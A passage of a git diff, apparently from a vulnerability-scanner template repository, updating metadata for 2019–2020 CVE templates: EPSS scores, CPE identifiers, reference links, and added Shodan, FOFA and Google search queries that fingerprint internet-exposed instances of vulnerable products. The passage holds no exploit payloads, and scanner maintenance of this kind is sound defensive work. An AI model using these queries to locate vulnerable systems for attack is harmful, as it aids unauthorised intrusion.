https://nvd.nist.gov/vuln/detail/CVE-2019-8390 - http://sourceforge.net/projects/qdpm + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-8390 cwe-id: CWE-79 - epss-score: 0.0161 - epss-percentile: 0.86055 + epss-score: 0.01911 + epss-percentile: 0.88548 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 + fofa-query: icon_hash=762074255 tags: cve,cve2019,xss,qdpm,authenticated,edb http: diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index f1844c79dd..2d08ccdea3 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8442 epss-score: 0.97131 - epss-percentile: 0.99777 + epss-percentile: 0.99799 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 808522bcd6..879faef983 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8446 cwe-id: CWE-863 epss-score: 0.15691 - epss-percentile: 0.95793 + epss-percentile: 0.95925 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 1d8c7ad05f..b1ab518e46 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-8449 cwe-id: CWE-306 - epss-score: 0.24444 - epss-percentile: 0.96513 + epss-score: 0.29471 + epss-percentile: 0.96907 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index f3e7f952fa..e06564bff8 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: digitaldruid product: hoteldruid + shodan-query: http.title:"hoteldruid" + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid http: diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 18e00665dc..0f039a65c1 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.6 cve-id: CVE-2019-8982 cwe-id: CWE-918 - epss-score: 0.02482 - epss-percentile: 0.89006 + epss-score: 0.01814 + epss-percentile: 0.88158 cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index b253e3b500..223c527492 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9618 cwe-id: CWE-22 - epss-score: 0.04914 - epss-percentile: 0.9261 + epss-score: 0.03376 + epss-percentile: 0.91411 cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index 874bd34942..cb87c282dd 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -13,12 +13,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9632 - cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:* epss-score: 0.00183 epss-percentile: 0.54622 + cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:* metadata: - product: electronic_document_security_management_system vendor: esafenet + product: electronic_document_security_management_system fofa-query: title="电子文档安全管理系统" tags: cve,cve2019,esafenet,lfi diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index 106cf248d2..b25322e974 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -22,13 +22,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9670 cwe-id: CWE-611 - epss-score: 0.97484 - epss-percentile: 0.99968 + epss-score: 0.97461 + epss-percentile: 0.99957 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor http: diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index f7ec3dec2b..9f933eec9b 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-9726 cwe-id: CWE-22 epss-score: 0.03616 - epss-percentile: 0.91446 + epss-percentile: 0.91664 cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index a39fdef2a7..f42e4cec13 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -19,13 +19,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-9733 - epss-score: 0.91018 - epss-percentile: 0.98791 + epss-score: 0.85254 + epss-percentile: 0.98535 cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jfrog product: artifactory + shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory" tags: cve,cve2019,packetstorm,artifactory,login,jfrog http: diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 0cb1c360e3..84c0a30781 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-9915 cwe-id: CWE-601 epss-score: 0.00123 - epss-percentile: 0.45694 + epss-percentile: 0.4663 cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index caff895c05..b3d1c3c9c4 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -13,13 +13,15 @@ info: - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - https://extensions.joomla.org/extension/je-messenger/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/azd-cert/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9922 cwe-id: CWE-22 - epss-score: 0.01171 - epss-percentile: 0.83428 + epss-score: 0.00972 + epss-percentile: 0.83335 cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index db74d9daff..e9902ace9e 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-0618 cwe-id: CWE-502 - epss-score: 0.97439 - epss-percentile: 0.99944 + epss-score: 0.97334 + epss-percentile: 0.99886 cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index c4ce13b9e8..65fe35feee 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -20,13 +20,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-10199 cwe-id: CWE-917 - epss-score: 0.97392 - epss-percentile: 0.99907 + epss-score: 0.97327 + epss-percentile: 0.99883 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sonatype product: nexus + fofa-query: title="nexus repository manager" tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev variables: username: admin diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index ea87e49534..8e66ece6f0 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-10220 cwe-id: CWE-89 epss-score: 0.03051 - epss-percentile: 0.90763 + epss-percentile: 0.90974 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: rconfig product: rconfig shodan-query: title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,packetstorm,rconfig,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 984c7f9d15..5d28634640 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-10546 cwe-id: CWE-89 epss-score: 0.38355 - epss-percentile: 0.97128 + epss-percentile: 0.97221 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2020,cve,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index ec66cff958..058e401921 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 77e8a662ea..a1aca44fc0 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -25,6 +25,9 @@ info: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 52a7cee915..e427cc0719 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-10549 cwe-id: CWE-89 epss-score: 0.38355 - epss-percentile: 0.97128 + epss-percentile: 0.97221 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 9e85dd16c1..f8a14a53ac 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -14,18 +14,22 @@ info: - https://www.exploit-db.com/exploits/50405 - https://nvd.nist.gov/vuln/detail/CVE-2020-10770 - https://bugzilla.redhat.com/show_bug.cgi?id=1846270 + - https://github.com/soosmile/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2020-10770 cwe-id: CWE-918 - epss-score: 0.3389 - epss-percentile: 0.96671 + epss-score: 0.16545 + epss-percentile: 0.96007 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: redhat product: keycloak + shodan-query: http.html:"keycloak" + fofa-query: title="keycloak" + google-query: intitle:"keycloak" tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat http: diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 90cab3e5d6..e5deffd637 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -30,6 +30,7 @@ info: vendor: wavlink product: wn530hg4_firmware shodan-query: http.html:"Wavlink" + fofa-query: body="wavlink" tags: cve,cve2020,exposure,wavlink http: diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 9c883a9ecc..81f2195e88 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -26,6 +26,9 @@ info: max-request: 2 vendor: glpi-project product: glpi + shodan-query: http.title:"glpi" + fofa-query: icon_hash="-1474875778" + google-query: intitle:"glpi" tags: cve,cve2020,redirect,glpi,glpi-project http: diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index b7c40c2109..d321cfa650 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -27,6 +27,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2020,cve,xss,grafana,hackerone http: diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 25dae9851f..24f8c3c185 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 - epss-score: 0.59818 - epss-percentile: 0.9769 + epss-score: 0.66624 + epss-percentile: 0.97932 cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 5b39e49bf0..8bde388e41 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-11530 cwe-id: CWE-89 epss-score: 0.83664 - epss-percentile: 0.98377 + epss-percentile: 0.98459 cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index f1a7556a7d..9c279b6f1d 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -28,6 +28,8 @@ info: vendor: superwebmailer product: superwebmailer shodan-query: title:"SuperWebMailer" + fofa-query: title="superwebmailer" + google-query: intitle:"superwebmailer" tags: cve,cve2020,rce,superwebmailer http: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 093f38b1fd..18eecc9895 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-11547 cwe-id: CWE-306 epss-score: 0.0011 - epss-percentile: 0.43127 + epss-percentile: 0.44069 cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: paessler product: prtg_network_monitor shodan-query: title:"prtg" + fofa-query: title="prtg" + google-query: intitle:"prtg" tags: cve2020,cve,prtg,disclosure,paessler http: diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 5fca7e72a8..c8536d75dc 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -27,6 +27,7 @@ info: vendor: konghq product: docker-kong framework: kong + shodan-query: cpe:"cpe:2.3:a:konghq:docker-kong" tags: cve,cve2020,kong,konghq http: diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 35696af729..687f0d2eb3 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -31,6 +31,7 @@ info: vendor: snapcreek product: duplicator framework: wordpress + google-query: inurl:"/wp-content/plugins/duplicator" tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek http: diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 7495b1df8e..8977168602 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -30,6 +30,7 @@ info: vendor: mitel product: micollab_audio\,_web_\&_video_conferencing shodan-query: html:"Mitel" html:"MiCollab" + fofa-query: body="mitel" html:"micollab" tags: cve,cve2020,packetstorm,mitel,micollab,lfi http: diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 19b38da641..3a16c33146 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-11853 - epss-score: 0.82121 - epss-percentile: 0.98108 + epss-score: 0.83699 + epss-percentile: 0.98462 cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 696fc8b18a..4dc5e625cc 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11854 cwe-id: CWE-798 - epss-score: 0.2548 - epss-percentile: 0.96589 + epss-score: 0.23333 + epss-percentile: 0.96551 cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index e20b060b70..73f440dec6 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11930 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.69031 + epss-percentile: 0.69597 cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,6 +28,8 @@ info: product: translate_wordpress_with_gtranslate framework: wordpress publicwww-query: "/wp-content/plugins/gtranslate" + shodan-query: http.html:/wp-content/plugins/gtranslate + fofa-query: body=/wp-content/plugins/gtranslate tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate http: diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 6ff8352739..101e15d16a 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11978 cwe-id: CWE-78 - epss-score: 0.97425 - epss-percentile: 0.99933 + epss-score: 0.97444 + epss-percentile: 0.99947 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve2020,cve,packetstorm,apache,airflow,rce,kev http: diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 4dc5e92986..a04b05015c 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -12,19 +12,22 @@ info: - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b - https://nvd.nist.gov/vuln/detail/CVE-2020-11991 - https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + - https://github.com/ARPSyndicate/cvemon + - https://github.com/H4ckTh3W0r1d/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11991 cwe-id: CWE-611 - epss-score: 0.81153 - epss-percentile: 0.98059 + epss-score: 0.81306 + epss-percentile: 0.98339 cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: cocoon shodan-query: http.html:"Apache Cocoon" + fofa-query: body="apache cocoon" tags: cve,cve2020,apache,xml,cocoon,xxe http: diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 2a3831aa1c..37371082c8 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-12054 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47553 + epss-percentile: 0.47703 cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index a0db01f9a6..4e1062166a 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -14,18 +14,22 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-12116 - https://www.manageengine.com/network-monitoring/help/read-me-complete.html - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12116 cwe-id: CWE-22 epss-score: 0.97317 - epss-percentile: 0.99861 + epss-percentile: 0.99876 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zohocorp product: manageengine_opmanager + shodan-query: http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: cve,cve2020,zoho,lfi,manageengine,zohocorp http: diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index ba9549111b..4c41b1da66 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -16,13 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12124 cwe-id: CWE-78 - epss-score: 0.9601 - epss-percentile: 0.99361 + epss-score: 0.94551 + epss-percentile: 0.99227 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wavlink product: wn530h4_firmware + shodan-query: http.html:"wavlink" + fofa-query: body="wavlink" tags: cve,cve2020,rce,wavlink variables: str: "{{rand_base(3)}}" diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index f49348ba37..6706323876 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 - epss-score: 0.06293 - epss-percentile: 0.93458 + epss-score: 0.06164 + epss-percentile: 0.93545 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: wavlink product: wn530h4_firmware shodan-query: http.html:"Wavlink" + fofa-query: body="wavlink" tags: cve,cve2020,wavlink,exposure http: diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index bf22dc4ca5..b07403baa8 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -26,6 +26,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,authenticated,xss http: diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 3026e1ed61..fcd1884b16 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-12259 cwe-id: CWE-79 epss-score: 0.16256 - epss-percentile: 0.95859 + epss-percentile: 0.95985 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,6 +26,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2020,cve,rconfig,authenticated,xss http: diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index da5cb58c9e..bb9a8edcc2 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 - epss-score: 0.01186 - epss-percentile: 0.8478 + epss-score: 0.01338 + epss-percentile: 0.86048 cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: teampass product: teampass shodan-query: http.html:"teampass" + fofa-query: body="teampass" tags: cve2020,cve,teampass,exposure,unauth http: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 876fe45ce4..e2af8fc0b1 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12720 cwe-id: CWE-306 - epss-score: 0.8836 - epss-percentile: 0.98614 + epss-score: 0.88621 + epss-percentile: 0.98693 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vbulletin product: vbulletin + google-query: intext:"powered by vbulletin" + shodan-query: http.title:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve2020,cve,vbulletin,sqli,packetstorm http: diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 0a7eb8a7b4..640c6ca27c 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -20,14 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - epss-score: 0.07866 - epss-percentile: 0.94083 - cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* + epss-score: 0.09416 + epss-percentile: 0.94709 + cpe: cpe:2.3:h:wavlink:wn575a4:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink - product: wn575a4_firmware + product: wn575a4 shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2020,wavlink,rce,oast,router diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index cd7764f649..883a1ca735 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13121 cwe-id: CWE-601 epss-score: 0.00235 - epss-percentile: 0.60944 + epss-percentile: 0.61592 cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index 